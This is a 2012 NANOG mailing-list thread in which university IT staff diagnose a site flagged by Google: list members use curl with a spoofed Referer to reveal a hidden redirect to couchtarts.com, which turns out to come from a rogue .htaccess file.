 a message of 18 lines which said:

> We believe the DNS servers used by Google's crawler have been poisoned.

[After reading the whole thread and discovering that Google was indeed
right.]

What made you think it can be a DNS cache poisoning (a very rare
event, despite what the media say) when there are many much more
realistic possibilities (specially for a Web site written in
PHP)?

What was the evidence pointing to a DNS problem?

Re: DNS poisoning at Google?

[Michael J Wise]

On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

Re: DNS poisoning at Google?

[Ishmael Rufus]

I'll take files that shouldn't have level 7 permissions for $400 alex.

On Wed, Jun 27, 2012 at 2:09 AM, Bryan Irvine  wrote:

> The fun part will be figuring out how it got there. :)
>
> Sent from my iPhone
>
> On Jun 27, 2012, at 12:06 AM, Matthew Black 
> wrote:
>
> > We found the aberrant .htaccess file and have removed it. What a mess!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Grant Ridder [mailto:shortdudey...@gmail.com]
> > Sent: Tuesday, June 26, 2012 11:02 PM
> > To: Matthew Black; nanog@nanog.org
> > Cc: Jeremy Hanmer
> > Subject: Re: DNS poisoning at Google?
> >
> > It also redirects with facebook, youtube, and ebay but NOT amazon.
> >
> > -Grant
> >
> > On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black  <mailto:matthew.bl...@csulb.edu>> wrote:
> > Our web lead was able to run curl. Thanks.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Grant Ridder [mailto:shortdudey...@gmail.com shortdudey...@gmail.com>]
> > Sent: Tuesday, June 26, 2012 10:53 PM
> > To: Matthew Black
> > Cc: Landon Stewart; nanog@nanog.org<mailto:nanog@nanog.org>; Jeremy
> Hanmer
> >
> > Subject: Re: DNS poisoning at Google?
> >
> > Matt, what happens you get on a subnet that can access the webservers
> directly and bypass the load balancer.  Try curl then and see if its
> something w/ the webserver or load balancer.
> >
> > -Grant
> > On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black  <mailto:matthew.bl...@csulb.edu>> wrote:
> > Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
> >
> > Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
> >
> > Our team is now scouring for that hidden redirect to couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> > From: Landon Stewart [mailto:lstew...@superb.net lstew...@superb.net>]
> > Sent: Tuesday, June 26, 2012 10:37 PM
> > To: Matthew Black
> > Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
> > Subject: Re: DNS poisoning at Google?
> > There is definitely a 301 redirect.
> >
> > $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> > HTTP/1.1<http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
> > Date: Wed, 27 Jun 2012 05:36:31 GMT
> > Server: Apache/2.0.63
> > Location: http://www.couchtarts.com/media.php
> > Connection: close
> > Content-Type: text/html; charset=iso-8859-1
> > On 26 June 2012 22:05, Matthew Black  matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu matthew.bl...@csulb.edu>>> wrote:
> > Google Webtools reports a problem with our HOMEPAGE "/". That page is
> not redirecting anywhere.
> > They also report problems with some 48 other primary sites, none of
> which redirect to the offending couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> >
> > -Original Message-
> > From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com jeremy.han...@dreamhost.com><mailto:jeremy.han...@dreamhost.com jeremy.han...@dreamhost.com>>]
> > Sent: Tuesday, June 26, 2012 9:58 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org
> <mailto:nanog@nanog.org>>
> > Subject: Re: DNS poisoning at Google?
> > It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
> > Airy:~ user$ curl -e 'http://google.com' csulb.edu<http://csulb.edu><
> http://csulb.edu> 
> 
> > 301 Moved Permanently
> > 
> > Moved Permanently
> > The document has moved http://www.couchtarts.com/media.php
> ">here.
> > 
> >
> > Running curl without the -e argument gives the proper site contents.
> > On Jun 26, 2012, at 9:24 PM, Matthew Black  <mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu matthew.bl...@csulb.edu>>> wrote:
> >
> >> Running Apache on three Sola

RE: DNS poisoning at Google?

[Ian McDonald]

Ahh, but how did it get there in the first place. Matthew, meet can of worms. I 
presume you have an opener.

--
ian
-Original Message-
From: Matthew Black
Sent:  27/06/2012, 08:07
To: Grant Ridder; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: RE: DNS poisoning at Google?

We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder 
[mailto:shortdudey...@gmail.com<mailto:shortdudey...@gmail.com>]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org<mailto:nanog@nanog.org>; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens you get on a subnet that can access the webservers directly 
and bypass the load balancer.  Try curl then and see if its something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1<http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com><mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: 
nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' 
csulb.edu<http://csulb.edu><http://csulb.edu>  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart 
> [mailto:lstew...@superb.net<mailto:lstew...@superb.net><mailto:lstew...@superb.net<mailto:lstew...@superb.net>>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: 
> nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
&

Re: DNS poisoning at Google?

[Bryan Irvine]

The fun part will be figuring out how it got there. :)

Sent from my iPhone

On Jun 27, 2012, at 12:06 AM, Matthew Black  wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Grant Ridder [mailto:shortdudey...@gmail.com]
> Sent: Tuesday, June 26, 2012 11:02 PM
> To: Matthew Black; nanog@nanog.org
> Cc: Jeremy Hanmer
> Subject: Re: DNS poisoning at Google?
> 
> It also redirects with facebook, youtube, and ebay but NOT amazon.
> 
> -Grant
> 
> On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Our web lead was able to run curl. Thanks.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Grant Ridder 
> [mailto:shortdudey...@gmail.com<mailto:shortdudey...@gmail.com>]
> Sent: Tuesday, June 26, 2012 10:53 PM
> To: Matthew Black
> Cc: Landon Stewart; nanog@nanog.org<mailto:nanog@nanog.org>; Jeremy Hanmer
> 
> Subject: Re: DNS poisoning at Google?
> 
> Matt, what happens you get on a subnet that can access the webservers 
> directly and bypass the load balancer.  Try curl then and see if its 
> something w/ the webserver or load balancer.
> 
> -Grant
> On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Thanks again to everyone who helped. I didn't know what to enter with curl, 
> because Outlook clobbered the line breaks in Jeremy's original message.
> 
> Also, curl failed on our primary webserver because of firewall and load 
> balancer magic settings. The Telnet method worked better!
> 
> Our team is now scouring for that hidden redirect to couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
> There is definitely a 301 redirect.
> 
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1<http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> On 26 June 2012 22:05, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
>  wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which 
> redirect to the offending couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> 
> -Original Message-
> From: Jeremy Hanmer 
> [mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com><mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>>]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: 
> nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check your 
> content (even that stored in a database) for anything that might be altering 
> data based on referrer.  This simple test shows what I mean:
> Airy:~ user$ curl -e 'http://google.com' 
> csulb.edu<http://csulb.edu><http://csulb.edu>  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved  href="http://www.couchtarts.com/media.php";>here.
> 
> 
> Running curl without the -e argument gives the proper site contents.
> On Jun 26, 2012, at 9:24 PM, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
>  wrote:
> 
>> Running Apache on three Solaris webservers behind a load balancer. No MS 
>> Windows!
>> 
>> Not sure how malicious software could get between our load balancer and Unix 
>> servers. Thanks for the tip!
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> 
>> 
>> 
>> From: Landon Stewart 
>> [mailto:lstew...@superb.net<

RE: DNS poisoning at Google?

[Matthew Black]

We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder 
[mailto:shortdudey...@gmail.com<mailto:shortdudey...@gmail.com>]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org<mailto:nanog@nanog.org>; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens you get on a subnet that can access the webservers directly 
and bypass the load balancer.  Try curl then and see if its something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1<http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com><mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: 
nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' 
csulb.edu<http://csulb.edu><http://csulb.edu>  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart 
> [mailto:lstew...@superb.net<mailto:lstew...@superb.net><mailto:lstew...@superb.net<mailto:lstew...@superb.net>>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: 
> nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu&l

Re: DNS poisoning at Google?

[Grant Ridder]

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black wrote:

>  Our web lead was able to run curl. Thanks.
>
> ** **
>
> matthew black
>
> information technology services
>
> california state university, long beach
>
> ** **
>
> *From:* Grant Ridder [mailto:shortdudey...@gmail.com]
> *Sent:* Tuesday, June 26, 2012 10:53 PM
> *To:* Matthew Black
> *Cc:* Landon Stewart; nanog@nanog.org; Jeremy Hanmer
>
> *Subject:* Re: DNS poisoning at Google?
>
> ** **
>
> Matt, what happens you get on a subnet that can access the webservers
> directly and bypass the load balancer.  Try curl then and see if its
> something w/ the webserver or load balancer.
>
> ** **
>
> -Grant
>
> On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
> wrote:
>
> Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
>
> Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
>
> Our team is now scouring for that hidden redirect to couchtarts.
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
> 
>
> From: Landon Stewart [mailto:lstew...@superb.net]
>
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org
>
> Subject: Re: DNS poisoning at Google?
>
> There is definitely a 301 redirect.
>
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 <http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> On 26 June 2012 22:05, Matthew Black  matthew.bl...@csulb.edu>> wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
> -Original Message-
>
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com jeremy.han...@dreamhost.com>]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
>
> Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu<http://csulb.edu>
>  
>
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black  <mailto:matthew.bl...@csulb.edu>> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
>
> > From: Landon Stewart [mailto:lstew...@superb.net lstew...@superb.net>]
>
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
>
> > Cc: nanog@nanog.org<mailto:nanog@nanog.org>
>
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
>
> > On 26 June 2012 20:53, Matthew Black  matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu matthew.bl...@csulb.edu>>> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com<http://couchtarts.com><
> http://couchtarts.com>.
>
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to

Re: DNS poisoning at Google?

[Jason Hellenthal]

On Tue, Jun 26, 2012 at 10:36:55PM -0700, Landon Stewart wrote:
> There is definitely a 301 redirect.
> 
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> 

And if you visit http://www.couchtarts.com/media.php using the correct
broser you end up back at http://google.com ...


> On 26 June 2012 22:05, Matthew Black  wrote:
> 
> > Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> > redirecting anywhere.
> > They also report problems with some 48 other primary sites, none of which
> > redirect to the offending couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> >
> >
> > -Original Message-
> > From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> > Sent: Tuesday, June 26, 2012 9:58 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > It's not DNS.  If you're sure there's no htaccess files in place, check
> > your content (even that stored in a database) for anything that might be
> > altering data based on referrer.  This simple test shows what I mean:
> >
> > Airy:~ user$ curl -e 'http://google.com' csulb.edu  > "-//IETF//DTD HTML 2.0//EN"> 
> > 301 Moved Permanently
> > 
> > Moved Permanently
> > The document has moved http://www.couchtarts.com/media.php
> > ">here.
> > 
> >
> > Running curl without the -e argument gives the proper site contents.
> >
> > On Jun 26, 2012, at 9:24 PM, Matthew Black 
> > wrote:
> >
> > > Running Apache on three Solaris webservers behind a load balancer. No MS
> > Windows!
> > >
> > > Not sure how malicious software could get between our load balancer and
> > Unix servers. Thanks for the tip!
> > >
> > > matthew black
> > > information technology services
> > > california state university, long beach
> > >
> > >
> > >
> > > From: Landon Stewart [mailto:lstew...@superb.net]
> > > Sent: Tuesday, June 26, 2012 9:07 PM
> > > To: Matthew Black
> > > Cc: nanog@nanog.org
> > > Subject: Re: DNS poisoning at Google?
> > >
> > > Is it possible that some malicious software is listening and injecting a
> > redirect on the wire?  We've seen this before with a Windows machine being
> > infected.
> > > On 26 June 2012 20:53, Matthew Black  > matthew.bl...@csulb.edu>> wrote:
> > > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects users
> > to another compromised website couchtarts.com<http://couchtarts.com>.
> > >
> > > We have thoroughly examined our root .htaccess and httpd.conf files and
> > are not redirecting to the problem target site. No recent changes either.
> > >
> > > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> > >
> > > We believe the DNS servers used by Google's crawler have been poisoned.
> > >
> > > Can anyone shed some light on this?
> > >
> > > matthew black
> > > information technology services
> > > california state university, long beach
> > > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> > >
> > >
> > >
> > > --
> > > Landon Stewart mailto:lstew...@superb.net>>
> > > Sr. Administrator
> > > Systems Engineering
> > > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
> > > of the Rest":
> > > http://www.superbhosting.net<http://www.superbhosting.net/>
> > >
> >
> >
> >
> >
> >
> 
> 
> -- 
> Landon Stewart 
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net

-- 

 - (2^(N-1))

Re: DNS poisoning at Google?

[Grant Ridder]

Matt, what happens you get on a subnet that can access the webservers
directly and bypass the load balancer.  Try curl then and see if its
something w/ the webserver or load balancer.

-Grant

On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black wrote:

> Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
>
> Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
>
> Our team is now scouring for that hidden redirect to couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> There is definitely a 301 redirect.
>
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> On 26 June 2012 22:05, Matthew Black  matthew.bl...@csulb.edu>> wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com jeremy.han...@dreamhost.com>]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu<http://csulb.edu>
>  
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
> On Jun 26, 2012, at 9:24 PM, Matthew Black  <mailto:matthew.bl...@csulb.edu>> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net lstew...@superb.net>]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black  matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu matthew.bl...@csulb.edu>>> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com<http://couchtarts.com><
> http://couchtarts.com>.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu><
> http://www.csulb.edu>
> >
> >
> >
> > --
> > Landon Stewart mailto:lstew...@superb.net lstew...@superb.net>>>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead
> > of the Rest":
> > http://www.superbhosting.net<http://www.superbhosting.net/>
> >
>
>
>
>
>
>
> --
> Landon Stewart mailto:lstew...@superb.net>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net<
> http://www.superbhosting.net/>
>
>

RE: DNS poisoning at Google?

[Matthew Black]

Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
